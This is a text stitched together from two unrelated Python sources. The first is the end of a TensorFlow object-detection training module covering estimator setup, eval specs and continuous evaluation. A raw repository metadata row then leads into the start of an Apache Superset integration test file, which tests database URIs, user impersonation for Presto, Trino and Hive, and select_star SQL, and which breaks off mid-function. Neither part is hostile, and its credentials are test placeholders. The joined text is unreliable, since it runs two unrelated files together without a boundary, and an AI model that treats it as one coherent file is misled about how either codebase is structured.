          include_patterns=include_variables,
          exclude_patterns=exclude_variables)

      clip_gradients_value = None
      if train_config.gradient_clipping_by_norm > 0:
        clip_gradients_value = train_config.gradient_clipping_by_norm

      if not use_tpu:
        for var in optimizer_summary_vars:
          tf.summary.scalar(var.op.name, var)
      summaries = [] if use_tpu else None
      if train_config.summarize_gradients:
        summaries = ['gradients', 'gradient_norm', 'global_gradient_norm']
      train_op = tf.contrib.layers.optimize_loss(
          loss=total_loss,
          global_step=global_step,
          learning_rate=None,
          clip_gradients=clip_gradients_value,
          optimizer=training_optimizer,
          update_ops=detection_model.updates(),
          variables=trainable_variables,
          summaries=summaries,
          name='')  # Preventing scope prefix on all variables.

    if mode == tf.estimator.ModeKeys.PREDICT:
      exported_output = exporter_lib.add_output_tensor_nodes(detections)
      export_outputs = {
          tf.saved_model.signature_constants.PREDICT_METHOD_NAME:
              tf.estimator.export.PredictOutput(exported_output)
      }

    # --- Evaluation metrics and visualizations (EVAL only). ---
    eval_metric_ops = None
    scaffold = None
    if mode == tf.estimator.ModeKeys.EVAL:
      # A model without detection_classes in its output is class-agnostic.
      class_agnostic = (
          fields.DetectionResultFields.detection_classes not in detections)
      groundtruth = _prepare_groundtruth_for_eval(
          detection_model, class_agnostic,
          eval_input_config.max_number_of_boxes)
      use_original_images = fields.InputDataFields.original_image in features
      if use_original_images:
        eval_images = features[fields.InputDataFields.original_image]
        # Keep only [height, width, channels] of the true image shapes.
        true_image_shapes = tf.slice(
            features[fields.InputDataFields.true_image_shape], [0, 0], [-1, 3])
        original_image_spatial_shapes = features[fields.InputDataFields
                                                 .original_image_spatial_shape]
      else:
        eval_images = features[fields.InputDataFields.image]
        true_image_shapes = None
        original_image_spatial_shapes = None

      eval_dict = eval_util.result_dict_for_batched_example(
          eval_images,
          features[inputs.HASH_KEY],
          detections,
          groundtruth,
          class_agnostic=class_agnostic,
          scale_to_absolute=True,
          original_image_spatial_shapes=original_image_spatial_shapes,
          true_image_shapes=true_image_shapes)

      if class_agnostic:
        category_index = label_map_util.create_class_agnostic_category_index()
      else:
        category_index = label_map_util.create_category_index_from_labelmap(
            eval_input_config.label_map_path)
      vis_metric_ops = None
      # Detection visualizations only run off-TPU and require original images.
      if not use_tpu and use_original_images:
        eval_metric_op_vis = vis_utils.VisualizeSingleFrameDetections(
            category_index,
            max_examples_to_draw=eval_config.num_visualizations,
            max_boxes_to_draw=eval_config.max_num_boxes_to_visualize,
            min_score_thresh=eval_config.min_score_threshold,
            use_normalized_coordinates=False)
        vis_metric_ops = eval_metric_op_vis.get_estimator_eval_metric_ops(
            eval_dict)

      # Eval metrics on a single example.
      eval_metric_ops = eval_util.get_eval_metric_ops_for_evaluators(
          eval_config, list(category_index.values()), eval_dict)
      for loss_key, loss_tensor in iter(losses_dict.items()):
        eval_metric_ops[loss_key] = tf.metrics.mean(loss_tensor)
      for var in optimizer_summary_vars:
        eval_metric_ops[var.op.name] = (var, tf.no_op())
      if vis_metric_ops is not None:
        eval_metric_ops.update(vis_metric_ops)
      eval_metric_ops = {str(k): v for k, v in eval_metric_ops.items()}

      if eval_config.use_moving_averages:
        # Restore EMA shadow values in place of the raw variables during eval.
        variable_averages = tf.train.ExponentialMovingAverage(0.0)
        variables_to_restore = variable_averages.variables_to_restore()
        keep_checkpoint_every_n_hours = (
            train_config.keep_checkpoint_every_n_hours)
        saver = tf.train.Saver(
            variables_to_restore,
            keep_checkpoint_every_n_hours=keep_checkpoint_every_n_hours)
        scaffold = tf.train.Scaffold(saver=saver)

    # EVAL executes on CPU, so use regular non-TPU EstimatorSpec.
    if use_tpu and mode != tf.estimator.ModeKeys.EVAL:
      return tf.contrib.tpu.TPUEstimatorSpec(
          mode=mode,
          scaffold_fn=scaffold_fn,
          predictions=detections,
          loss=total_loss,
          train_op=train_op,
          eval_metrics=eval_metric_ops,
          export_outputs=export_outputs)
    else:
      if scaffold is None:
        keep_checkpoint_every_n_hours = (
            train_config.keep_checkpoint_every_n_hours)
        saver = tf.train.Saver(
            sharded=True,
            keep_checkpoint_every_n_hours=keep_checkpoint_every_n_hours,
            save_relative_paths=True)
        tf.add_to_collection(tf.GraphKeys.SAVERS, saver)
        scaffold = tf.train.Scaffold(saver=saver)
      return tf.estimator.EstimatorSpec(
          mode=mode,
          predictions=detections,
          loss=total_loss,
          train_op=train_op,
          eval_metric_ops=eval_metric_ops,
          export_outputs=export_outputs,
          scaffold=scaffold)

  return model_fn
def create_estimator_and_inputs(run_config,
                                hparams,
                                pipeline_config_path,
                                config_override=None,
                                train_steps=None,
                                sample_1_of_n_eval_examples=1,
                                sample_1_of_n_eval_on_train_examples=1,
                                model_fn_creator=create_model_fn,
                                use_tpu_estimator=False,
                                use_tpu=False,
                                num_shards=1,
                                params=None,
                                override_eval_num_epochs=True,
                                save_final_config=False,
                                **kwargs):
  """Creates `Estimator`, input functions, and steps.

  Args:
    run_config: A `RunConfig`.
    hparams: A `HParams`.
    pipeline_config_path: A path to a pipeline config file.
    config_override: A pipeline_pb2.TrainEvalPipelineConfig text proto to
      override the config from `pipeline_config_path`.
    train_steps: Number of training steps. If None, the number of training
      steps is set from the `TrainConfig` proto.
    sample_1_of_n_eval_examples: Integer representing how often an eval example
      should be sampled. If 1, will sample all examples.
    sample_1_of_n_eval_on_train_examples: Similar to
      `sample_1_of_n_eval_examples`, except controls the sampling of training
      data for evaluation.
    model_fn_creator: A function that creates a `model_fn` for `Estimator`.
      Follows the signature:

      * Args:
        * `detection_model_fn`: Function that returns `DetectionModel`
          instance.
        * `configs`: Dictionary of pipeline config objects.
        * `hparams`: `HParams` object.
      * Returns:
        `model_fn` for `Estimator`.

    use_tpu_estimator: Whether a `TPUEstimator` should be returned. If False,
      an `Estimator` will be returned.
    use_tpu: Boolean, whether training and evaluation should run on TPU. Only
      used if `use_tpu_estimator` is True.
    num_shards: Number of shards (TPU cores). Only used if `use_tpu_estimator`
      is True.
    params: Parameter dictionary passed from the estimator. Only used if
      `use_tpu_estimator` is True.
    override_eval_num_epochs: Whether to overwrite the number of epochs to
      1 for eval_input.
    save_final_config: Whether to save final config (obtained after applying
      overrides) to `estimator.model_dir`.
    **kwargs: Additional keyword arguments for configuration override.

  Returns:
    A dictionary with the following fields:
    'estimator': An `Estimator` or `TPUEstimator`.
    'train_input_fn': A training input function.
    'eval_input_fns': A list of all evaluation input functions.
    'eval_input_names': A list of names for each evaluation input.
    'eval_on_train_input_fn': An evaluation-on-train input function.
    'predict_input_fn': A prediction input function.
    'train_steps': Number of training steps. Either directly from input or
      from configuration.
  """
  # Resolve the builder helpers through the indirection map so they can be
  # substituted externally.
  get_configs_from_pipeline_file = MODEL_BUILD_UTIL_MAP[
      'get_configs_from_pipeline_file']
  merge_external_params_with_configs = MODEL_BUILD_UTIL_MAP[
      'merge_external_params_with_configs']
  create_pipeline_proto_from_configs = MODEL_BUILD_UTIL_MAP[
      'create_pipeline_proto_from_configs']
  create_train_input_fn = MODEL_BUILD_UTIL_MAP['create_train_input_fn']
  create_eval_input_fn = MODEL_BUILD_UTIL_MAP['create_eval_input_fn']
  create_predict_input_fn = MODEL_BUILD_UTIL_MAP['create_predict_input_fn']

  configs = get_configs_from_pipeline_file(pipeline_config_path,
                                           config_override=config_override)
  # Fold explicit arguments into kwargs so they participate in the config
  # override below.
  kwargs.update({
      'train_steps': train_steps,
      'sample_1_of_n_eval_examples': sample_1_of_n_eval_examples
  })
  if override_eval_num_epochs:
    kwargs.update({'eval_num_epochs': 1})
    tf.logging.warning(
        'Forced number of epochs for all eval validations to be 1.')
  configs = merge_external_params_with_configs(
      configs, hparams, kwargs_dict=kwargs)
  model_config = configs['model']
  train_config = configs['train_config']
  train_input_config = configs['train_input_config']
  eval_config = configs['eval_config']
  eval_input_configs = configs['eval_input_configs']
  # Eval-on-train reuses the training input config, deep-copied so the
  # sampling/num_epochs tweaks below do not leak into training.
  eval_on_train_input_config = copy.deepcopy(train_input_config)
  eval_on_train_input_config.sample_1_of_n_examples = (
      sample_1_of_n_eval_on_train_examples)
  if override_eval_num_epochs and eval_on_train_input_config.num_epochs != 1:
    tf.logging.warning('Expected number of evaluation epochs is 1, but '
                       'instead encountered `eval_on_train_input_config'
                       '.num_epochs` = '
                       '{}. Overwriting `num_epochs` to 1.'.format(
                           eval_on_train_input_config.num_epochs))
    eval_on_train_input_config.num_epochs = 1

  # update train_steps from config but only when non-zero value is provided
  if train_steps is None and train_config.num_steps != 0:
    train_steps = train_config.num_steps

  detection_model_fn = functools.partial(
      model_builder.build, model_config=model_config)

  # Create the input functions for TRAIN/EVAL/PREDICT.
  train_input_fn = create_train_input_fn(
      train_config=train_config,
      train_input_config=train_input_config,
      model_config=model_config)
  eval_input_fns = [
      create_eval_input_fn(
          eval_config=eval_config,
          eval_input_config=eval_input_config,
          model_config=model_config) for eval_input_config in eval_input_configs
  ]
  eval_input_names = [
      eval_input_config.name for eval_input_config in eval_input_configs
  ]
  eval_on_train_input_fn = create_eval_input_fn(
      eval_config=eval_config,
      eval_input_config=eval_on_train_input_config,
      model_config=model_config)
  predict_input_fn = create_predict_input_fn(
      model_config=model_config, predict_input_config=eval_input_configs[0])

  # NOTE(review): `export_to_tpu` is only read for logging here; export
  # handling presumably happens elsewhere — confirm against callers.
  export_to_tpu = hparams.get('export_to_tpu', False)
  tf.logging.info('create_estimator_and_inputs: use_tpu %s, export_to_tpu %s',
                  use_tpu, export_to_tpu)
  model_fn = model_fn_creator(detection_model_fn, configs, hparams, use_tpu)
  if use_tpu_estimator:
    estimator = tf.contrib.tpu.TPUEstimator(
        model_fn=model_fn,
        train_batch_size=train_config.batch_size,
        # For each core, only batch size 1 is supported for eval.
        eval_batch_size=num_shards * 1 if use_tpu else 1,
        use_tpu=use_tpu,
        config=run_config,
        # TODO(lzc): Remove conditional after CMLE moves to TF 1.9
        params=params if params else {})
  else:
    estimator = tf.estimator.Estimator(model_fn=model_fn, config=run_config)

  # Write the as-run pipeline config to disk.
  if run_config.is_chief and save_final_config:
    pipeline_config_final = create_pipeline_proto_from_configs(configs)
    config_util.save_pipeline_config(pipeline_config_final, estimator.model_dir)

  return dict(
      estimator=estimator,
      train_input_fn=train_input_fn,
      eval_input_fns=eval_input_fns,
      eval_input_names=eval_input_names,
      eval_on_train_input_fn=eval_on_train_input_fn,
      predict_input_fn=predict_input_fn,
      train_steps=train_steps)
def create_train_and_eval_specs(train_input_fn,
                                eval_input_fns,
                                eval_on_train_input_fn,
                                predict_input_fn,
                                train_steps,
                                eval_on_train_data=False,
                                final_exporter_name='Servo',
                                eval_spec_names=None):
  """Builds the `TrainSpec` and the list of `EvalSpec`s for an Estimator run.

  Args:
    train_input_fn: Function that produces features and labels on train data.
    eval_input_fns: A list of functions that produce features and labels on
      eval data.
    eval_on_train_input_fn: Function that produces features and labels for
      evaluation on train data.
    predict_input_fn: Function that produces features for inference.
    train_steps: Number of training steps.
    eval_on_train_data: Whether to evaluate model on training data. Default is
      False.
    final_exporter_name: String name given to `FinalExporter`.
    eval_spec_names: A list of string names for each `EvalSpec`. When None,
      the specs are named "0", "1", ... positionally.

  Returns:
    Tuple of `TrainSpec` and list of `EvalSpec`s. If `eval_on_train_data` is
    True, the last `EvalSpec` in the list corresponds to training data; all
    preceding entries correspond to `eval_input_fns` in order.
  """
  train_spec = tf.estimator.TrainSpec(
      input_fn=train_input_fn, max_steps=train_steps)

  if eval_spec_names is None:
    # Fall back to positional names for unnamed eval inputs.
    eval_spec_names = [str(i) for i in range(len(eval_input_fns))]

  eval_specs = []
  for index, (spec_name, input_fn) in enumerate(
      zip(eval_spec_names, eval_input_fns)):
    # The first exporter keeps the bare `final_exporter_name` so existing
    # export directory layouts remain valid; subsequent ones get a suffix.
    exporter_name = (
        final_exporter_name if index == 0 else
        '{}_{}'.format(final_exporter_name, spec_name))
    eval_specs.append(
        tf.estimator.EvalSpec(
            name=spec_name,
            input_fn=input_fn,
            steps=None,
            exporters=tf.estimator.FinalExporter(
                name=exporter_name,
                serving_input_receiver_fn=predict_input_fn)))

  if eval_on_train_data:
    eval_specs.append(
        tf.estimator.EvalSpec(
            name='eval_on_train', input_fn=eval_on_train_input_fn, steps=None))

  return train_spec, eval_specs
def continuous_eval(estimator, model_dir, input_fn, train_steps, name):
  """Perform continuous evaluation on checkpoints written to a model directory.

  Args:
    estimator: Estimator object to use for evaluation.
    model_dir: Model directory to read checkpoints for continuous evaluation.
    input_fn: Input function to use for evaluation.
    train_steps: Number of training steps. This is used to infer the last
      checkpoint and stop evaluation loop.
    name: Namescope for eval summary.
  """

  def terminate_eval():
    tf.logging.info('Terminating eval after 180 seconds of no checkpoints')
    return True

  # NOTE(review): `timeout=None` means checkpoints_iterator waits forever and
  # `timeout_fn` is never invoked, so the "terminating after 180 seconds"
  # message above appears unreachable; 180 here is only the polling interval.
  # Confirm whether a finite `timeout` was intended.
  for ckpt in tf.contrib.training.checkpoints_iterator(
      model_dir, min_interval_secs=180, timeout=None,
      timeout_fn=terminate_eval):

    tf.logging.info('Starting Evaluation.')
    try:
      eval_results = estimator.evaluate(
          input_fn=input_fn, steps=None, checkpoint_path=ckpt, name=name)
      tf.logging.info('Eval results: %s' % eval_results)

      # Terminate eval job when final checkpoint is reached.
      # Checkpoint paths look like ".../model.ckpt-<step>"; parse the step.
      current_step = int(os.path.basename(ckpt).split('-')[1])
      if current_step >= train_steps:
        tf.logging.info(
            'Evaluation finished after training step %d' % current_step)
        break

    except tf.errors.NotFoundError:
      # The checkpoint may have been garbage-collected between discovery and
      # evaluation; skip it and wait for the next one.
      tf.logging.info(
          'Checkpoint %s no longer exists, skipping checkpoint' % ckpt)
def populate_experiment(run_config,
                        hparams,
                        pipeline_config_path,
                        train_steps=None,
                        eval_steps=None,
                        model_fn_creator=create_model_fn,
                        **kwargs):
  """Populates an `Experiment` object.

  EXPERIMENT CLASS IS DEPRECATED. Please switch to
  tf.estimator.train_and_evaluate. As an example, see model_main.py.

  Args:
    run_config: A `RunConfig`.
    hparams: A `HParams`.
    pipeline_config_path: A path to a pipeline config file.
    train_steps: Number of training steps. If None, the number of training
      steps is set from the `TrainConfig` proto.
    eval_steps: Number of evaluation steps per evaluation cycle. If None, the
      number of evaluation steps is set from the `EvalConfig` proto.
    model_fn_creator: A function that creates a `model_fn` for `Estimator`.
      Follows the signature:

      * Args:
        * `detection_model_fn`: Function that returns `DetectionModel`
          instance.
        * `configs`: Dictionary of pipeline config objects.
        * `hparams`: `HParams` object.
      * Returns:
        `model_fn` for `Estimator`.

    **kwargs: Additional keyword arguments for configuration override.

  Returns:
    An `Experiment` that defines all aspects of training, evaluation, and
    export.
  """
  tf.logging.warning('Experiment is being deprecated. Please use '
                     'tf.estimator.train_and_evaluate(). See model_main.py for '
                     'an example.')

  # NOTE(review): `eval_steps` is not a declared parameter of
  # create_estimator_and_inputs; it travels via **kwargs into the config
  # override machinery — confirm it is a key that
  # merge_external_params_with_configs recognizes.
  train_and_eval_dict = create_estimator_and_inputs(
      run_config,
      hparams,
      pipeline_config_path,
      train_steps=train_steps,
      eval_steps=eval_steps,
      model_fn_creator=model_fn_creator,
      save_final_config=True,
      **kwargs)
  estimator = train_and_eval_dict['estimator']
  train_input_fn = train_and_eval_dict['train_input_fn']
  eval_input_fns = train_and_eval_dict['eval_input_fns']
  predict_input_fn = train_and_eval_dict['predict_input_fn']
  train_steps = train_and_eval_dict['train_steps']

  export_strategies = [
      tf.contrib.learn.utils.saved_model_export_utils.make_export_strategy(
          serving_input_fn=predict_input_fn)
  ]

  # Only the first eval input is used; Experiment supports a single eval_fn.
  return tf.contrib.learn.Experiment(
      estimator=estimator,
      train_input_fn=train_input_fn,
      eval_input_fn=eval_input_fns[0],
      train_steps=train_steps,
      eval_steps=None,
      export_strategies=export_strategies,
      eval_delay_secs=120,
  )
| 42.542125 | 80 | 0.709402 |
ace75da35a88fa7131185ac9f819e0035667cfa8 | 23,482 | py | Python | tests/integration_tests/model_tests.py | ronna/superset | 95b28fc1346939017f8f6d867abeb12c7704d846 | [
"Apache-2.0"
] | 1 | 2022-02-10T09:11:41.000Z | 2022-02-10T09:11:41.000Z | tests/integration_tests/model_tests.py | ronna/superset | 95b28fc1346939017f8f6d867abeb12c7704d846 | [
"Apache-2.0"
] | null | null | null | tests/integration_tests/model_tests.py | ronna/superset | 95b28fc1346939017f8f6d867abeb12c7704d846 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# isort:skip_file
import json
import textwrap
import unittest
from unittest import mock
from superset import security_manager
from superset.connectors.sqla.models import SqlaTable
from superset.exceptions import SupersetException
from superset.utils.core import override_user
from tests.integration_tests.fixtures.birth_names_dashboard import (
load_birth_names_dashboard_with_slices,
load_birth_names_data,
)
import pytest
from sqlalchemy.engine.url import make_url
from sqlalchemy.types import DateTime
import tests.integration_tests.test_app
from superset import app, db as metadata_db
from superset.db_engine_specs.postgres import PostgresEngineSpec
from superset.common.db_query_status import QueryStatus
from superset.models.core import Database
from superset.models.slice import Slice
from superset.utils.database import get_example_database
from .base_tests import SupersetTestCase
from .fixtures.energy_dashboard import (
load_energy_table_with_slice,
load_energy_table_data,
)
class TestDatabaseModel(SupersetTestCase):
    """Integration tests for the ``Database`` model.

    Covers per-backend schema handling in connection URIs, user
    impersonation for Presto/Trino/Hive, ``select_star`` SQL generation
    and error mapping during engine creation.
    """

    @unittest.skipUnless(
        SupersetTestCase.is_module_installed("requests"), "requests not installed"
    )
    def test_database_schema_presto(self):
        """Presto keeps catalog/schema in the engine URL's database part."""
        sqlalchemy_uri = "presto://presto.airbnb.io:8080/hive/default"
        model = Database(database_name="test_database", sqlalchemy_uri=sqlalchemy_uri)
        db = make_url(model.get_sqla_engine().url).database
        self.assertEqual("hive/default", db)
        db = make_url(model.get_sqla_engine(schema="core_db").url).database
        self.assertEqual("hive/core_db", db)

        # Catalog-only URI: the schema argument is appended to the catalog.
        sqlalchemy_uri = "presto://presto.airbnb.io:8080/hive"
        model = Database(database_name="test_database", sqlalchemy_uri=sqlalchemy_uri)
        db = make_url(model.get_sqla_engine().url).database
        self.assertEqual("hive", db)
        db = make_url(model.get_sqla_engine(schema="core_db").url).database
        self.assertEqual("hive/core_db", db)

    def test_database_schema_postgres(self):
        """Postgres ignores the ``schema`` argument in the engine URL."""
        sqlalchemy_uri = "postgresql+psycopg2://postgres.airbnb.io:5439/prod"
        model = Database(database_name="test_database", sqlalchemy_uri=sqlalchemy_uri)
        db = make_url(model.get_sqla_engine().url).database
        self.assertEqual("prod", db)
        db = make_url(model.get_sqla_engine(schema="foo").url).database
        self.assertEqual("prod", db)

    @unittest.skipUnless(
        SupersetTestCase.is_module_installed("thrift"), "thrift not installed"
    )
    @unittest.skipUnless(
        SupersetTestCase.is_module_installed("pyhive"), "pyhive not installed"
    )
    def test_database_schema_hive(self):
        """Hive replaces the URI database with the requested schema."""
        sqlalchemy_uri = "hive://hive@hive.airbnb.io:10000/default?auth=NOSASL"
        model = Database(database_name="test_database", sqlalchemy_uri=sqlalchemy_uri)
        db = make_url(model.get_sqla_engine().url).database
        self.assertEqual("default", db)
        db = make_url(model.get_sqla_engine(schema="core_db").url).database
        self.assertEqual("core_db", db)

    @unittest.skipUnless(
        SupersetTestCase.is_module_installed("MySQLdb"), "mysqlclient not installed"
    )
    def test_database_schema_mysql(self):
        """MySQL replaces the URI database with the requested schema."""
        sqlalchemy_uri = "mysql://root@localhost/superset"
        model = Database(database_name="test_database", sqlalchemy_uri=sqlalchemy_uri)
        db = make_url(model.get_sqla_engine().url).database
        self.assertEqual("superset", db)
        db = make_url(model.get_sqla_engine(schema="staging").url).database
        self.assertEqual("staging", db)

    @unittest.skipUnless(
        SupersetTestCase.is_module_installed("MySQLdb"), "mysqlclient not installed"
    )
    def test_database_impersonate_user(self):
        """impersonate_user swaps the connection username for the current user."""
        uri = "mysql://root@localhost"
        example_user = security_manager.find_user(username="gamma")
        model = Database(database_name="test_database", sqlalchemy_uri=uri)

        with override_user(example_user):
            model.impersonate_user = True
            username = make_url(model.get_sqla_engine().url).username
            self.assertEqual(example_user.username, username)

            model.impersonate_user = False
            username = make_url(model.get_sqla_engine().url).username
            self.assertNotEqual(example_user.username, username)

    @mock.patch("superset.models.core.create_engine")
    def test_impersonate_user_presto(self, mocked_create_engine):
        """Presto impersonation adds principal_username to connect_args."""
        uri = "presto://localhost"
        principal_user = security_manager.find_user(username="gamma")
        extra = """
        {
            "metadata_params": {},
            "engine_params": {
                "connect_args":{
                    "protocol": "https",
                    "username":"original_user",
                    "password":"original_user_password"
                }
            },
            "metadata_cache_timeout": {},
            "schemas_allowed_for_file_upload": []
        }
        """

        with override_user(principal_user):
            model = Database(
                database_name="test_database", sqlalchemy_uri=uri, extra=extra
            )
            model.impersonate_user = True
            model.get_sqla_engine()
            call_args = mocked_create_engine.call_args

            assert str(call_args[0][0]) == "presto://gamma@localhost"

            assert call_args[1]["connect_args"] == {
                "protocol": "https",
                "username": "original_user",
                "password": "original_user_password",
                "principal_username": "gamma",
            }

            model.impersonate_user = False
            model.get_sqla_engine()
            call_args = mocked_create_engine.call_args

            assert str(call_args[0][0]) == "presto://localhost"

            assert call_args[1]["connect_args"] == {
                "protocol": "https",
                "username": "original_user",
                "password": "original_user_password",
            }

    @mock.patch("superset.models.core.create_engine")
    def test_impersonate_user_trino(self, mocked_create_engine):
        """Trino impersonation passes the user via connect_args['user']."""
        principal_user = security_manager.find_user(username="gamma")

        with override_user(principal_user):
            model = Database(
                database_name="test_database", sqlalchemy_uri="trino://localhost"
            )
            model.impersonate_user = True
            model.get_sqla_engine()
            call_args = mocked_create_engine.call_args

            assert str(call_args[0][0]) == "trino://localhost"
            assert call_args[1]["connect_args"] == {"user": "gamma"}

            # Password must be stripped from the URL when impersonating.
            model = Database(
                database_name="test_database",
                sqlalchemy_uri="trino://original_user:original_user_password@localhost",
            )

            model.impersonate_user = True
            model.get_sqla_engine()
            call_args = mocked_create_engine.call_args

            assert str(call_args[0][0]) == "trino://original_user@localhost"
            assert call_args[1]["connect_args"] == {"user": "gamma"}

    @mock.patch("superset.models.core.create_engine")
    def test_impersonate_user_hive(self, mocked_create_engine):
        """Hive impersonation uses hive.server2.proxy.user configuration."""
        uri = "hive://localhost"
        principal_user = security_manager.find_user(username="gamma")
        extra = """
        {
            "metadata_params": {},
            "engine_params": {
                "connect_args":{
                    "protocol": "https",
                    "username":"original_user",
                    "password":"original_user_password"
                }
            },
            "metadata_cache_timeout": {},
            "schemas_allowed_for_file_upload": []
        }
        """

        with override_user(principal_user):
            model = Database(
                database_name="test_database", sqlalchemy_uri=uri, extra=extra
            )
            model.impersonate_user = True
            model.get_sqla_engine()
            call_args = mocked_create_engine.call_args

            assert str(call_args[0][0]) == "hive://localhost"

            assert call_args[1]["connect_args"] == {
                "protocol": "https",
                "username": "original_user",
                "password": "original_user_password",
                "configuration": {"hive.server2.proxy.user": "gamma"},
            }

            model.impersonate_user = False
            model.get_sqla_engine()
            call_args = mocked_create_engine.call_args

            assert str(call_args[0][0]) == "hive://localhost"

            assert call_args[1]["connect_args"] == {
                "protocol": "https",
                "username": "original_user",
                "password": "original_user_password",
            }

    @pytest.mark.usefixtures("load_energy_table_with_slice")
    def test_select_star(self):
        """select_star emits backend-appropriate quoting and column lists."""
        db = get_example_database()
        table_name = "energy_usage"
        sql = db.select_star(table_name, show_cols=False, latest_partition=False)
        quote = db.inspector.engine.dialect.identifier_preparer.quote_identifier
        expected = (
            textwrap.dedent(
                f"""\
            SELECT *
            FROM {quote(table_name)}
            LIMIT 100"""
            )
            if db.backend in {"presto", "hive"}
            else textwrap.dedent(
                f"""\
            SELECT *
            FROM {table_name}
            LIMIT 100"""
            )
        )
        assert expected in sql
        sql = db.select_star(table_name, show_cols=True, latest_partition=False)
        # TODO(bkyryliuk): unify sql generation
        if db.backend == "presto":
            assert (
                textwrap.dedent(
                    """\
                SELECT "source" AS "source",
                       "target" AS "target",
                       "value" AS "value"
                FROM "energy_usage"
                LIMIT 100"""
                )
                == sql
            )
        elif db.backend == "hive":
            assert (
                textwrap.dedent(
                    """\
                SELECT `source`,
                       `target`,
                       `value`
                FROM `energy_usage`
                LIMIT 100"""
                )
                == sql
            )
        else:
            assert (
                textwrap.dedent(
                    """\
                SELECT source,
                       target,
                       value
                FROM energy_usage
                LIMIT 100"""
                )
                in sql
            )

    def test_select_star_fully_qualified_names(self):
        """Schema and table names with special characters are quoted."""
        db = get_example_database()
        schema = "schema.name"
        table_name = "table/name"
        sql = db.select_star(
            table_name, schema=schema, show_cols=False, latest_partition=False
        )
        fully_qualified_names = {
            "sqlite": '"schema.name"."table/name"',
            "mysql": "`schema.name`.`table/name`",
            "postgres": '"schema.name"."table/name"',
        }
        fully_qualified_name = fully_qualified_names.get(db.db_engine_spec.engine)
        if fully_qualified_name:
            expected = textwrap.dedent(
                f"""\
            SELECT *
            FROM {fully_qualified_name}
            LIMIT 100"""
            )
            assert sql.startswith(expected)

    def test_single_statement(self):
        """get_df runs a single statement, with or without trailing ';'."""
        main_db = get_example_database()

        if main_db.backend == "mysql":
            df = main_db.get_df("SELECT 1", None)
            self.assertEqual(df.iat[0, 0], 1)

            df = main_db.get_df("SELECT 1;", None)
            self.assertEqual(df.iat[0, 0], 1)

    def test_multi_statement(self):
        """get_df runs multi-statement SQL; ';' in a literal is preserved."""
        main_db = get_example_database()

        if main_db.backend == "mysql":
            df = main_db.get_df("USE superset; SELECT 1", None)
            self.assertEqual(df.iat[0, 0], 1)

            df = main_db.get_df("USE superset; SELECT ';';", None)
            self.assertEqual(df.iat[0, 0], ";")

    @mock.patch("superset.models.core.create_engine")
    def test_get_sqla_engine(self, mocked_create_engine):
        """DBAPI exceptions during engine creation map to SupersetException."""
        model = Database(
            database_name="test_database",
            sqlalchemy_uri="mysql://root@localhost",
        )
        model.db_engine_spec.get_dbapi_exception_mapping = mock.Mock(
            return_value={Exception: SupersetException}
        )
        mocked_create_engine.side_effect = Exception()
        with self.assertRaises(SupersetException):
            model.get_sqla_engine()
class TestSqlaTableModel(SupersetTestCase):
    """Integration tests for ``SqlaTable``.

    Covers timestamp-expression generation, free-form SQL expressions in
    queries, SQL mutators and the ``data_for_slices`` payload.
    """

    @pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
    def test_get_timestamp_expression(self):
        """Time grains wrap the column (and any custom SQL expression)."""
        tbl = self.get_table(name="birth_names")
        ds_col = tbl.get_column("ds")
        sqla_literal = ds_col.get_timestamp_expression(None)
        assert str(sqla_literal.compile()) == "ds"

        sqla_literal = ds_col.get_timestamp_expression("P1D")
        compiled = "{}".format(sqla_literal.compile())
        if tbl.database.backend == "mysql":
            assert compiled == "DATE(ds)"

        prev_ds_expr = ds_col.expression
        ds_col.expression = "DATE_ADD(ds, 1)"
        sqla_literal = ds_col.get_timestamp_expression("P1D")
        compiled = "{}".format(sqla_literal.compile())
        if tbl.database.backend == "mysql":
            assert compiled == "DATE(DATE_ADD(ds, 1))"
        # Restore shared fixture state for subsequent tests.
        ds_col.expression = prev_ds_expr

    @pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
    def test_get_timestamp_expression_epoch(self):
        """epoch_s columns are converted with from_unixtime before graining."""
        tbl = self.get_table(name="birth_names")
        ds_col = tbl.get_column("ds")

        ds_col.expression = None
        ds_col.python_date_format = "epoch_s"
        sqla_literal = ds_col.get_timestamp_expression(None)
        compiled = "{}".format(sqla_literal.compile())
        if tbl.database.backend == "mysql":
            self.assertEqual(compiled, "from_unixtime(ds)")

        ds_col.python_date_format = "epoch_s"
        sqla_literal = ds_col.get_timestamp_expression("P1D")
        compiled = "{}".format(sqla_literal.compile())
        if tbl.database.backend == "mysql":
            self.assertEqual(compiled, "DATE(from_unixtime(ds))")

        prev_ds_expr = ds_col.expression
        ds_col.expression = "DATE_ADD(ds, 1)"
        sqla_literal = ds_col.get_timestamp_expression("P1D")
        compiled = "{}".format(sqla_literal.compile())
        if tbl.database.backend == "mysql":
            self.assertEqual(compiled, "DATE(from_unixtime(DATE_ADD(ds, 1)))")
        # Restore shared fixture state for subsequent tests.
        ds_col.expression = prev_ds_expr

    def query_with_expr_helper(self, is_timeseries, inner_join=True):
        """Run a query with free-form SQL groupby and metric expressions.

        Returns the resulting dataframe, or None when the backend cannot
        honour the requested ``inner_join`` setting.
        """
        tbl = self.get_table(name="birth_names")
        ds_col = tbl.get_column("ds")
        ds_col.expression = None
        ds_col.python_date_format = None
        spec = self.get_database_by_id(tbl.database_id).db_engine_spec
        if not spec.allows_joins and inner_join:
            # if the db does not support inner joins, we cannot force it so
            return None
        old_inner_join = spec.allows_joins
        spec.allows_joins = inner_join

        arbitrary_gby = "state || gender || '_test'"
        arbitrary_metric = dict(
            label="arbitrary", expressionType="SQL", sqlExpression="SUM(num_boys)"
        )
        query_obj = dict(
            groupby=[arbitrary_gby, "name"],
            metrics=[arbitrary_metric],
            filter=[],
            is_timeseries=is_timeseries,
            columns=[],
            granularity="ds",
            from_dttm=None,
            to_dttm=None,
            extras=dict(time_grain_sqla="P1Y"),
            series_limit=15 if inner_join and is_timeseries else None,
        )
        qr = tbl.query(query_obj)
        self.assertEqual(qr.status, QueryStatus.SUCCESS)
        sql = qr.query
